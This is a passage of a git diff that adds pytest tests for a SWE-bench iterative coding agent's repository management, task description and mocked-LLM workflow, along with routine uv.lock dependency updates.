+# test_cleanup - Resource cleanup +# ============================================================================= + +class TestCleanup: + """Tests for resource cleanup operations.""" + + async def test_repo_manager_cleanup(self, tmp_path): + """Test that RepoManager cleans up all active repos.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Create some fake repo directories + repo1 = tmp_path / "org1" / "repo1" + repo2 = tmp_path / "org2" / "repo2" + repo1.mkdir(parents=True) + repo2.mkdir(parents=True) + + # Add to active repos + manager.active_repos[str(repo1)] = MagicMock(repo_path=repo1) + manager.active_repos[str(repo2)] = MagicMock(repo_path=repo2) + + await manager.cleanup() + + assert not repo1.exists() + assert not repo2.exists() + assert len(manager.active_repos) == 0 + + async def test_cleanup_handles_missing_directory(self, tmp_path): + """Test that cleanup handles already-deleted directories gracefully.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Add a non-existent path to active repos + fake_path = tmp_path / "nonexistent" + manager.active_repos[str(fake_path)] = MagicMock(repo_path=fake_path) + + # Should not raise + await manager.cleanup() + + assert len(manager.active_repos) == 0 + + async def test_register_cleanup_error_handling(self, tmp_path): + """Test that register.py cleanup handles errors gracefully.""" + from unittest.mock import AsyncMock + + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + # Create a mock that raises an exception + manager = RepoManager(str(tmp_path)) + manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) + + # Verify that cleanup raises an exception (simulating failure) + with pytest.raises(Exception, match="Cleanup failed"): + await manager.cleanup() + + +# ============================================================================= +# Integration test with mocked LLM +# ============================================================================= + +# ============================================================================= +# Additional coverage tests +# ============================================================================= + +class TestAdditionalCoverage: + """Additional tests to improve coverage.""" + + def test_build_task_description_with_hints(self): + """Test task description building with hints.""" + from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor + + # Create a mock SWEBenchInput + mock_input = MagicMock() + mock_input.problem_statement = "Fix the bug" + mock_input.hints_text = "Check the utils module" + + # Create a minimal predictor to test the method + predictor = object.__new__(SweBenchPredictor) + result = predictor._build_task_description(mock_input) + + assert "Fix the bug" in result + assert "Additional Context" in result + assert "Check the utils module" in result + + def test_build_task_description_without_hints(self): + """Test task description building without hints.""" + from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor + + mock_input = MagicMock() + mock_input.problem_statement = "Fix the bug" + mock_input.hints_text = None + + predictor = object.__new__(SweBenchPredictor) + result = predictor._build_task_description(mock_input) + + assert "Fix the bug" in result + assert "Additional Context" not in result + + async def test_repo_manager_setup_existing_repo(self, tmp_path): + """Test setup_repository when repo is already active.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoContext + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Create a mock context already in active_repos + repo_path = tmp_path / "instance-1" / "org" / "repo" + repo_path.mkdir(parents=True) + + mock_context = RepoContext( + repo_url="https://github.com/org/repo", + repo_path=repo_path, + repo=MagicMock() + ) + manager.active_repos[str(repo_path)] = mock_context + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.checkout_commit') as mock_checkout: + mock_checkout.return_value = None + + result = await manager.setup_repository( + "https://github.com/org/repo", + "abc123", + "instance-1" + ) + + assert result == mock_context + mock_checkout.assert_called_once() + + async def test_clone_cleans_existing_path(self, tmp_path): + """Test that clone removes existing directory before cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + target_path.mkdir() + (target_path / "existing_file.txt").write_text("old content") + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo'): + mock_repo = MagicMock() + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.return_value = mock_repo + + result = await clone_repository("https://github.com/org/repo", target_path) + + # The old directory should have been removed (in reality, then clone creates new) + assert result == mock_repo + + async def test_checkout_timeout(self): + """Test checkout operation timeout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await checkout_commit(mock_repo, "abc123", timeout=1) + + def test_output_truncation(self, agent): + """Test that long outputs are properly truncated.""" + # Generate output longer than max_output_length + long_output = "x" * 2000 # Config has max_output_length=1000 + + # Simulate truncation logic + max_length = agent.config.max_output_length + if len(long_output) > max_length: + elided_chars = len(long_output) - max_length + head_tail_length = max_length // 2 + truncated = ( + f"{long_output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{long_output[-head_tail_length:]}" + ) + + assert "elided_chars" in truncated + assert "1000 characters elided" in truncated + + async def test_add_message_invalid_role(self, agent): + """Test that invalid role raises ValueError.""" + with pytest.raises(ValueError) as exc_info: + agent.add_message("invalid_role", "content") + + assert "Unknown role" in str(exc_info.value) + + +class TestIntegrationMockedLLM: + """Integration tests with mocked LLM.""" + + async def test_full_workflow_simulation(self, tmp_path): + """Simulate a complete workflow with realistic LLM responses.""" + # Create a mock LLM + mock_llm = AsyncMock() + + # Simulate a realistic interaction: explore, edit, test, submit + responses = [ + # Step 1: Explore + create_llm_response( + "THOUGHT: First, let me understand the project structure.\n\n```bash\nls -la\n```" + ), + # Step 2: Read file + create_llm_response( + "THOUGHT: Let me look at the main file.\n\n```bash\ncat main.py\n```" + ), + # Step 3: Make edit + create_llm_response( + "THOUGHT: I found the bug. Let me fix it.\n\n```bash\nsed -i 's/old/new/g' main.py\n```" + ), + # Step 4: Submit + create_llm_response( + "THOUGHT: The fix is complete. Submitting.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```" + ), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Create test files + repo_path = tmp_path / "repo" + repo_path.mkdir() + (repo_path / "main.py").write_text("old code here") + + config = IterativeAgentConfig(step_limit=10, timeout=5) + agent = IterativeAgent(mock_llm, repo_path, config) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # Return realistic outputs for each command + mock_thread.side_effect = [ + MagicMock(returncode=0, stdout="main.py\nREADME.md\n"), + MagicMock(returncode=0, stdout="old code here\n"), + MagicMock(returncode=0, stdout=""), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/main.py\n-old\n+new"), + ] + + exit_status, _patch_result = await agent.run("Fix the bug in main.py") + + assert exit_status == "Submitted" + assert agent.n_steps == 4 + assert agent.total_input_tokens > 0 + assert agent.total_output_tokens > 0 diff --git a/examples/evaluation_and_profiling/swe_bench/uv.lock b/examples/evaluation_and_profiling/swe_bench/uv.lock index af3cf0b0ad..56ab2f0a51 100644 --- a/examples/evaluation_and_profiling/swe_bench/uv.lock +++ b/examples/evaluation_and_profiling/swe_bench/uv.lock @@ -932,6 +932,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/e8/2e1462c8fdbe0f210feb5ac7ad2d9029af8be3bf45bd9fa39765f821642f/greenlet-3.3.1-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:5fd23b9bc6d37b563211c6abbb1b3cab27db385a4449af5c32e932f93017080c", size = 274974, upload-time = "2026-01-23T15:31:02.891Z" }, { url = "https://files.pythonhosted.org/packages/7e/a8/530a401419a6b302af59f67aaf0b9ba1015855ea7e56c036b5928793c5bd/greenlet-3.3.1-cp311-cp311-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:09f51496a0bfbaa9d74d36a52d2580d1ef5ed4fdfcff0a73730abfbbbe1403dd", size = 577175, upload-time = "2026-01-23T16:00:56.213Z" }, { url = "https://files.pythonhosted.org/packages/8e/89/7e812bb9c05e1aaef9b597ac1d0962b9021d2c6269354966451e885c4e6b/greenlet-3.3.1-cp311-cp311-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:cb0feb07fe6e6a74615ee62a880007d976cf739b6669cce95daa7373d4fc69c5", size = 590401, upload-time = "2026-01-23T16:05:26.365Z" }, + { url = "https://files.pythonhosted.org/packages/70/ae/e2d5f0e59b94a2269b68a629173263fa40b63da32f5c231307c349315871/greenlet-3.3.1-cp311-cp311-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:67ea3fc73c8cd92f42467a72b75e8f05ed51a0e9b1d15398c913416f2dafd49f", size = 601161, upload-time = "2026-01-23T16:15:53.456Z" }, { url = "https://files.pythonhosted.org/packages/5c/ae/8d472e1f5ac5efe55c563f3eabb38c98a44b832602e12910750a7c025802/greenlet-3.3.1-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:39eda9ba259cc9801da05351eaa8576e9aa83eb9411e8f0c299e05d712a210f2", size = 590272, upload-time = "2026-01-23T15:32:49.411Z" }, { url = "https://files.pythonhosted.org/packages/a8/51/0fde34bebfcadc833550717eade64e35ec8738e6b097d5d248274a01258b/greenlet-3.3.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:e2e7e882f83149f0a71ac822ebf156d902e7a5d22c9045e3e0d1daf59cee2cc9", size = 1550729, upload-time = "2026-01-23T16:04:20.867Z" }, { url = "https://files.pythonhosted.org/packages/16/c9/2fb47bee83b25b119d5a35d580807bb8b92480a54b68fef009a02945629f/greenlet-3.3.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:80aa4d79eb5564f2e0a6144fcc744b5a37c56c4a92d60920720e99210d88db0f", size = 1615552, upload-time = "2026-01-23T15:33:45.743Z" }, @@ -940,6 +941,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/f9/c8/9d76a66421d1ae24340dfae7e79c313957f6e3195c144d2c73333b5bfe34/greenlet-3.3.1-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:7e806ca53acf6d15a888405880766ec84721aa4181261cd11a457dfe9a7a4975", size = 276443, upload-time = "2026-01-23T15:30:10.066Z" }, { url = "https://files.pythonhosted.org/packages/81/99/401ff34bb3c032d1f10477d199724f5e5f6fbfb59816ad1455c79c1eb8e7/greenlet-3.3.1-cp312-cp312-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d842c94b9155f1c9b3058036c24ffb8ff78b428414a19792b2380be9cecf4f36", size = 597359, upload-time = "2026-01-23T16:00:57.394Z" }, { url = "https://files.pythonhosted.org/packages/2b/bc/4dcc0871ed557792d304f50be0f7487a14e017952ec689effe2180a6ff35/greenlet-3.3.1-cp312-cp312-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:20fedaadd422fa02695f82093f9a98bad3dab5fcda793c658b945fcde2ab27ba", size = 607805, upload-time = "2026-01-23T16:05:28.068Z" }, + { url = "https://files.pythonhosted.org/packages/3b/cd/7a7ca57588dac3389e97f7c9521cb6641fd8b6602faf1eaa4188384757df/greenlet-3.3.1-cp312-cp312-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:c620051669fd04ac6b60ebc70478210119c56e2d5d5df848baec4312e260e4ca", size = 622363, upload-time = "2026-01-23T16:15:54.754Z" }, { url = "https://files.pythonhosted.org/packages/cf/05/821587cf19e2ce1f2b24945d890b164401e5085f9d09cbd969b0c193cd20/greenlet-3.3.1-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:14194f5f4305800ff329cbf02c5fcc88f01886cadd29941b807668a45f0d2336", size = 609947, upload-time = "2026-01-23T15:32:51.004Z" }, { url = "https://files.pythonhosted.org/packages/a4/52/ee8c46ed9f8babaa93a19e577f26e3d28a519feac6350ed6f25f1afee7e9/greenlet-3.3.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:7b2fe4150a0cf59f847a67db8c155ac36aed89080a6a639e9f16df5d6c6096f1", size = 1567487, upload-time = "2026-01-23T16:04:22.125Z" }, { url = "https://files.pythonhosted.org/packages/8f/7c/456a74f07029597626f3a6db71b273a3632aecb9afafeeca452cfa633197/greenlet-3.3.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:49f4ad195d45f4a66a0eb9c1ba4832bb380570d361912fa3554746830d332149", size = 1636087, upload-time = "2026-01-23T15:33:47.486Z" }, @@ -948,6 +950,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/ab/d26750f2b7242c2b90ea2ad71de70cfcd73a948a49513188a0fc0d6fc15a/greenlet-3.3.1-cp313-cp313-macosx_11_0_universal2.whl", hash = "sha256:7ab327905cabb0622adca5971e488064e35115430cec2c35a50fd36e72a315b3", size = 275205, upload-time = "2026-01-23T15:30:24.556Z" }, { url = "https://files.pythonhosted.org/packages/10/d3/be7d19e8fad7c5a78eeefb2d896a08cd4643e1e90c605c4be3b46264998f/greenlet-3.3.1-cp313-cp313-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:65be2f026ca6a176f88fb935ee23c18333ccea97048076aef4db1ef5bc0713ac", size = 599284, upload-time = "2026-01-23T16:00:58.584Z" }, { url = "https://files.pythonhosted.org/packages/ae/21/fe703aaa056fdb0f17e5afd4b5c80195bbdab701208918938bd15b00d39b/greenlet-3.3.1-cp313-cp313-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:7a3ae05b3d225b4155bda56b072ceb09d05e974bc74be6c3fc15463cf69f33fd", size = 610274, upload-time = "2026-01-23T16:05:29.312Z" }, + { url = "https://files.pythonhosted.org/packages/06/00/95df0b6a935103c0452dad2203f5be8377e551b8466a29650c4c5a5af6cc/greenlet-3.3.1-cp313-cp313-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:12184c61e5d64268a160226fb4818af4df02cfead8379d7f8b99a56c3a54ff3e", size = 624375, upload-time = "2026-01-23T16:15:55.915Z" }, { url = "https://files.pythonhosted.org/packages/cb/86/5c6ab23bb3c28c21ed6bebad006515cfe08b04613eb105ca0041fecca852/greenlet-3.3.1-cp313-cp313-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6423481193bbbe871313de5fd06a082f2649e7ce6e08015d2a76c1e9186ca5b3", size = 612904, upload-time = "2026-01-23T15:32:52.317Z" }, { url = "https://files.pythonhosted.org/packages/c2/f3/7949994264e22639e40718c2daf6f6df5169bf48fb038c008a489ec53a50/greenlet-3.3.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:33a956fe78bbbda82bfc95e128d61129b32d66bcf0a20a1f0c08aa4839ffa951", size = 1567316, upload-time = "2026-01-23T16:04:23.316Z" }, { url = "https://files.pythonhosted.org/packages/8d/6e/d73c94d13b6465e9f7cd6231c68abde838bb22408596c05d9059830b7872/greenlet-3.3.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4b065d3284be43728dd280f6f9a13990b56470b81be20375a207cdc814a983f2", size = 1636549, upload-time = "2026-01-23T15:33:48.643Z" }, @@ -2003,8 +2006,8 @@ requires-dist = [ { name = "nvidia-nat-autogen", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_autogen" }, { name = "nvidia-nat-core", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", marker = "extra == 'core'", editable = "../../../packages/nvidia_nat_core" }, - { name = "nvidia-nat-core", marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["async-endpoints"], marker = "extra == 'async-endpoints'", editable = "../../../packages/nvidia_nat_core" }, + { name = "nvidia-nat-core", extras = ["async-endpoints", "gunicorn", "pii-defense", "profiling"], marker = "extra == 'most'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["gunicorn"], marker = "extra == 'gunicorn'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["pii-defense"], marker = "extra == 'pii-defense'", editable = "../../../packages/nvidia_nat_core" }, { name = "nvidia-nat-core", extras = ["profiling"], marker = "extra == 'profiling'", editable = "../../../packages/nvidia_nat_core" },